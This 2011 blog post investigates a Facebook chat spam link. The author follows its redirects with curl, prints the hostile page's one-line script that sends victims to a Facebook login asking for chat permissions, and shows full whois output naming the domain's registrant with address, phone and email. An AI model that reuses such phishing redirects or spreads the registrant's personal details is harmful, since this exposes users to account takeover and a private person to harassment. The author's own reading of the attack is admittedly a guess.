New malware attack hits facebook through chat!

I just got pings from three of my friends over facebook chat, all of them containing the same message

Hey, check out this girl, lol, she must be out of her mind for making that video!: bit.ly/eNYMXb

Well, so lets see where does the link take us..

anshup@listsettle-lm: ~$ curl -I bit.ly/eNYMXb
HTTP/1.1 301 Moved
Server: nginx
Date: Sat, 19 Mar 2011 09:35:54 GMT
Content-Type: text/html; charset=utf-8
Connection: keep-alive
Set-Cookie: _bit=4d8478fa-003c1-04438-d8ac8fa8;domain=.bit.ly;expires=Thu Sep 15 05:35:54 2011;path=/; HttpOnly
Cache-control: private; max-age=90
Location: http://www.torsing.info/
MIME-Version: 1.0
Content-Length: 116

As expected, the first bitly link is a proper redirect to some site. Now lets see what the second link has.

anshup@listsettle-lm: ~$ curl -I http://www.torsing.info/
HTTP/1.1 302 Found
Date: Sat, 19 Mar 2011 09:36:04 GMT
Server: Apache
Location: http://www.torsing.info//dashboard.php
Connection: close
Content-Type: text/html

Hmm, another redirect to same site, not bad.

anshup@listsettle-lm: ~$ curl -I http://www.torsing.info//dashboard.php
HTTP/1.1 200 OK
Date: Sat, 19 Mar 2011 09:36:11 GMT
Server: Apache
Connection: close
Content-Type: text/html

anshup@listsettle-lm: ~$ curl http://www.torsing.info//dashboard.php
<script type='text/javascript'>top.location.href = 'https://www.facebook.com/login.php?api_key=134003950005663&cancel_url=http%3A%2F%2Fwww.torsing.info%2Fmain.php&display=page&fbconnect=1&next=http%3A%2F%2Fwww.torsing.info%2Fdashboard.php&return_session=1&session_version=3&v=1.0&req_perms=xmpp_login';</script>

Now here is the bad part!
As you see in the last output, its merely a trick to directly access your facebook credentials as if you approved it (thats my assumption, am not sure what it does and am not going to find that out right now.

What I am surprised at is that facebook uses a non salted/non nounced url for such requests.. :!
Definitely you know better facebook :)

lets see how fast it spreads and what all comes out of it!

Lets see a lil about the domain.

anshup@listsettle-lm: ~$ whois torsing.info
Domain ID:D36666838-LRMS
Domain Name:TORSING.INFO
Created On:05-Feb-2011 19:58:43 UTC
Last Updated On:06-Feb-2011 10:32:05 UTC
Expiration Date:05-Feb-2012 19:58:43 UTC
Sponsoring Registrar:GoDaddy.com Inc. (R171-LRMS)
Status:CLIENT DELETE PROHIBITED
Status:CLIENT RENEW PROHIBITED
Status:CLIENT TRANSFER PROHIBITED
Status:CLIENT UPDATE PROHIBITED
Status:TRANSFER PROHIBITED
Registrant ID:CR74380736
Registrant Name:Matej Kalanj
Registrant Organization:
Registrant Street1:Marohniceva 18
Registrant Street2:
Registrant Street3:
Registrant City:Rijeka
Registrant State/Province:Primorsko goranska
Registrant Postal Code:51000
Registrant Country:HR
Registrant Phone:+385.955533376
Registrant Phone Ext.:
Registrant FAX:
Registrant FAX Ext.:
Registrant Email:webmaster@sex-galerije.com
Admin ID:CR74380738
Admin Name:Matej Kalanj
Admin Organization:
Admin Street1:Marohniceva 18
Admin Street2:
Admin Street3:
Admin City:Rijeka
Admin State/Province:Primorsko goranska
Admin Postal Code:51000
Admin Country:HR
Admin Phone:+385.955533376
Admin Phone Ext.:
Admin FAX:
Admin FAX Ext.:
Admin Email:webmaster@sex-galerije.com
Billing ID:CR74380739
Billing Name:Matej Kalanj
Billing Organization:
Billing Street1:Marohniceva 18
Billing Street2:
Billing Street3:
Billing City:Rijeka
Billing State/Province:Primorsko goranska
Billing Postal Code:51000
Billing Country:HR
Billing Phone:+385.955533376
Billing Phone Ext.:
Billing FAX:
Billing FAX Ext.:
Billing Email:webmaster@sex-galerije.com
Tech ID:CR74380737
Tech Name:Matej Kalanj
Tech Organization:
Tech Street1:Marohniceva 18
Tech Street2:
Tech Street3:
Tech City:Rijeka
Tech State/Province:Primorsko goranska
Tech Postal Code:51000
Tech Country:HR
Tech Phone:+385.955533376
Tech Phone Ext.:
Tech FAX:
Tech FAX Ext.:
Tech Email:webmaster@sex-galerije.com
Name Server:MDNS1.NMSERVERS.COM
Name Server:MDNS2.NMSERVERS.COM

Hmmm, so a site registered in croatia. Interesting.

Written on March 19, 2011